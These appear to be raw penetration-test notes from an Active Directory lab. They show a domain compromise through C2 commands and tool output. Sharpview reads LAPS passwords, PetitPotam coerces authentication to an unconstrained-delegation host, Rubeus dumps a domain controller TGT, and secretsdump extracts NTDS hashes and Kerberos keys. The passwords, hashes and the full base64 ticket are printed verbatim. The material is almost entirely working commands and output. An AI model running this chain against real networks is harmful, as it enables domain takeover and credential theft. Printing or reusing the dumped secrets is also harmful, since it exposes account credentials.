sliver (COLOURFUL_HEADLINE) > sharpview Get-DomainObject -Identity web05 -Properties "ms-mcs-AdmPwd",name
[*] sharpview output:
[Get-DomainSearcher] search base: LDAP://DC03.INFINITY.COM/DC=INFINITY,DC=COM
[Get-DomainObject] Get-DomainComputer filter string: (&(|(|(samAccountName=web05)(name=web05)(displayname=web05))))
name : WEB05
ms-mcs-admpwd : 7-dveLtQYN3-R9
sliver (COLOURFUL_HEADLINE) > sharpview Get-DomainObject -Identity client -Properties "ms-mcs-AdmPwd",name
[*] sharpview output:
[Get-DomainSearcher] search base: LDAP://DC03.INFINITY.COM/DC=INFINITY,DC=COM
[Get-DomainObject] Get-DomainComputer filter string: (&(|(|(samAccountName=client)(name=client)(displayname=client))))
name : CLIENT
ms-mcs-admpwd : 0d)-9pso[qdEDQ
msv : [00000003] Primary * Username : ted * Domain : INFINITY * NTLM : e929e69f7c290222be87968263a9282e * SHA1 : 3f7364074ccaecba65146ef560e88211ec18cc16 * DPAPI : dcc46fe5434b57a72a6c1e850e3c221f
RDP in to web05 which is having uncontraied delegatin
└─$ python3 PetitPotam.py -u ted -hashes e929e69f7c290222be87968263a9282e:e929e69f7c290222be87968263a9282e -d infinity.com -dc-ip 192.168.209.120 -target-ip 192.168.209.120 listener 192.168.209.121
___ _ _ _ ___ _
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
| _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
_|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
Trying pipe lsarpc
[-] Connecting to ncacn_np:192.168.209.121[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Unconstrained Delegation
FInd uncontrained Delegation
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH COLLECT(c1.name) AS domainControllers MATCH (c2 {unconstraineddelegation:true}) WHERE NOT c2.name IN domainControllers RETURN c2
C:\Users\ted\Desktop>PetitPotam.exe dc03 web05
PetitPotam.exe dc03 web05
Usage: PetitPotam.exe <captureServerIP> <targetServerIP> <EFS-API-to-use>
Valid EFS APIs are:
1: EfsRpcOpenFileRaw (fixed with CVE-2021-36942)
2: EfsRpcEncryptFileSrv
3: EfsRpcDecryptFileSrv
4: EfsRpcQueryUsersOnFile
5: EfsRpcQueryRecoveryAgents
6: EfsRpcRemoveUsersFromFile
6: EfsRpcAddUsersToFile
C:\Users\ted\Desktop>PetitPotam.exe web05 dc03 1
PetitPotam.exe web05 dc03 1
Attack success!!!
C:\Users\ted\Desktop>
Invoke-Rubeus -Command 'dump /user:DC03$ /service:krbtgt /nowrap'
PS C:\Windows\system32> whoami whoami nt authority\system PS C:\Windows\system32>
doIFDDCCBQigAwIBBaEDAgEWooIEFDCCBBBhggQMMIIECKADAgEFoQ4bDElORklOSVRZLkNPTaIhMB+gAwIBAqEYMBYbBmtyYnRndBsMSU5GSU5JVFkuQ09No4IDzDCCA8igAwIBEqEDAgECooIDugSCA7YKg+mzpFPnBVNsA5v/aFXF0z9vNZkUaTStk9cUR7y6d+CDVIY4vscGtTZXJ3r1yRiRgXA7RrroyzKbtCwyvkFKsGLXlEp6Fx+2wHJansHvfIJM6IxU03eNSy1ab8A4wxptIMIThe1yhg3H/FWr63OKiWGu63SgzcbxEm6JK1NEMUSsSStbl0gW5Bn/IctqrhH3SfMm9pS/ClyAU4aYq5l+fLdnOvmATkr3r7J5g6+LtTZXcDllXS8uKDJs8WkAKAUCT9iYhgeRk+ogB3lDIc94ZLl3hP1HOoPKJqvZ/hpe7TyqDiQY1kXtaU8sJPcCvdPhKZFvBp0PrAT03tjpl5c864iExl7GH6E7VBrCJy8CSjLn7pUZyEZqUTXSAAIFQWqgRRZAzWS8hFgZMb/weiwomZ0YqFtzP963qB8GizmWCCxEJKch7rWj1N7byra9Gp2Z6Re3SaCmfhEjJdC37jPpt9iAtHI2jd86bKObGu0GTJtJrwzkL/pie9Wt/VdWboJnO9lBxT/zaj3e8ag7PwsHWkiywCxTB8v+aenLILxm9GrthGxBSRegJKyf9S+yec8NRQ4OJMpD/AdT2XQZHGks+FtxT8KRcV4A84cbulYbIcxrggpTv7jiodBAutnAJNNkW0eqeiI+8trc3ytft9En9WewFhr/uSRu2tS9uybDO0vUwEt8YSXBpefaT5vPmzbzg+n3+k3NGcZJqXoSQO7MUi12PpWcmKNtdik5vKv5+qkQot4aVzFvOdSoeRynSPylJPzkWY6S2gKlboY4UloN8/wVcias3NPNcdVmrr3oyo306DsYoee9BjHa20Al+UrLRfG+xCxbFZ6tCZDL3nOz8pT7F5n8Gs0WMsAipQMLZlElr/w/Pg599nls9SmfYMCMOtlASOc+AEAHItI3xE9CgrxmDmSwgXwujCzn+I7FM647sKZPyrjBRSCEm3dfqxr7iMgLcAoLiS5wJY3Nszj9t4TCQt8koWJu4kk+4DNpGcK8aD5/7B3I7B2MPMNOksvT9+h/EItc7Z+XNiOQLyk9AEHZeRCZtzOt44pQaIZoNRI2XvJN2GJltKclKFeRXcHXzPYPE6QfDz3syFWPUmVxMS0gGjT7u2fHpRuwJvKEUv+1I2mTlzSmpXscxdXdtn6NH8yWq53NN16upOV2lg4gyQ+SuoXDjEIZnBvVTkWqSYO7pNjqT5qnbPvM80YWGBJNgDYPBN84pXCluOyp42F5hjorXBtlcgej6ErZCy3Ok7rchLwcUaOB4zCB4KADAgEAooHYBIHVfYHSMIHPoIHMMIHJMIHGoCswKaADAgESoSIEINQWeJvQKBCv5qdxv+jKfK302VInN3XZRrFw8ZlLkS9xoQ4bDElORklOSVRZLkNPTaISMBCgAwIBAaEJMAcbBURDMDMkowcDBQBgoQAApREYDzIwMjQwMzEyMDYzNjEyWqYRGA8yMDI0MDMxMjE2MzYxMlqnERgPMjAyNDAzMTkwNjM2MTJaqA4bDElORklOSVRZLkNPTakhMB+gAwIBAqEYMBYbBmtyYnRndBsMSU5GSU5JVFkuQ09N
──(jay㉿localhost)-[~]
└─$ cd osep
┌──(jay㉿localhost)-[~/osep]
└─$ vim tgt.b64
┌──(jay㉿localhost)-[~/osep]
└─$ cat tgt.b64|base64 -d > ticket.kirbi
┌──(jay㉿localhost)-[~/osep]
└─$ ticketConverter.py ticket.kirbi ticket.ccache
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] converting kirbi to ccache...
[+] done
┌──(jay㉿localhost)-[~/osep]
└─$ export KRB5CCNAME=ticket.ccache
└─$ secretsdump.py -k -no-pass 'infinity.com/DC03$@DC03'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5f9163ca3b673adfff2828f368ca3760:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:120f9d6c433ec5b065fee44cf0f89354:::
infinity.com\ella:1105:aad3b435b51404eeaad3b435b51404ee:441e1d56843d467d3913ed44e53a84f5:::
infinity.com\ted:1106:aad3b435b51404eeaad3b435b51404ee:e929e69f7c290222be87968263a9282e:::
infinity.com\pete:1107:aad3b435b51404eeaad3b435b51404ee:00f50c4047ef95b6349492e3eb0a1b41:::
DC03$:1000:aad3b435b51404eeaad3b435b51404ee:48ad3603255044ebf62ab5db339cd36b:::
WEB05$:1103:aad3b435b51404eeaad3b435b51404ee:28c986e6a7946505220c62b2b8d9473e:::
CLIENT$:1104:aad3b435b51404eeaad3b435b51404ee:0c5fd2f6d1ee37bf09947d4db799270f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:785e6e61c0eda169adc146ab918b066248100931e88ba383f073c64c2bf7113b
Administrator:aes128-cts-hmac-sha1-96:eac0585ea88b4d9ff071af6d089c548c
Administrator:des-cbc-md5:9d5e135716a43838
krbtgt:aes256-cts-hmac-sha1-96:7a154fd1677573822fd624637e4e6e9317ce16314a653a8d33ba70d8a5e490f9
krbtgt:aes128-cts-hmac-sha1-96:3b4ccfbf48509327979f18c07c3f5a6f
krbtgt:des-cbc-md5:3e19c7133be09257
infinity.com\ella:aes256-cts-hmac-sha1-96:e88fe20a57772776d01d67b880402c73d49b0bab244ad19bd6d7fcf9260315f3
infinity.com\ella:aes128-cts-hmac-sha1-96:cd65b0be12bc39fcbc018cbed31bb9fc
infinity.com\ella:des-cbc-md5:4968323e92bcb5d3
infinity.com\ted:aes256-cts-hmac-sha1-96:f2a5cbaf0c08a2656de1d7b6ab51822d27490031d11e90631f687e2450032919
infinity.com\ted:aes128-cts-hmac-sha1-96:61204da36cdd70042c922f64781c558a
infinity.com\ted:des-cbc-md5:31b0e3e61a7c1fe5
infinity.com\pete:aes256-cts-hmac-sha1-96:f5c00fde8bc2d6600254d1cfb4988ee3fce752349389af3ce226a0b16357193d
infinity.com\pete:aes128-cts-hmac-sha1-96:8c24406600a258ee42d77a17862c274a
infinity.com\pete:des-cbc-md5:072673a2e52329b0
DC03$:aes256-cts-hmac-sha1-96:14fd1c475535b2dbdb41692b15077844d8be181d4e9f19bb378479637ee676d0
DC03$:aes128-cts-hmac-sha1-96:be70a91643f4b4ad4904bd6403abb7aa
DC03$:des-cbc-md5:57f4cb458697e676
WEB05$:aes256-cts-hmac-sha1-96:b4e2bd0da956b412d0235d0b0f3b54b6c8ba0ec46cca1059303fe312463debee
WEB05$:aes128-cts-hmac-sha1-96:cd3ed53eb2fdbb02f22c3472e62a7adc
WEB05$:des-cbc-md5:7a9df7540e940d58
CLIENT$:aes256-cts-hmac-sha1-96:9155bda406d8501c4f28b2c01c149f126ded5a703eea711090c13b66b48e7149
CLIENT$:aes128-cts-hmac-sha1-96:2a572e9f9173bb62552e39dd17dfc6c5
CLIENT$:des-cbc-md5:76c8e531e9ecb35d
[*] Cleaning up...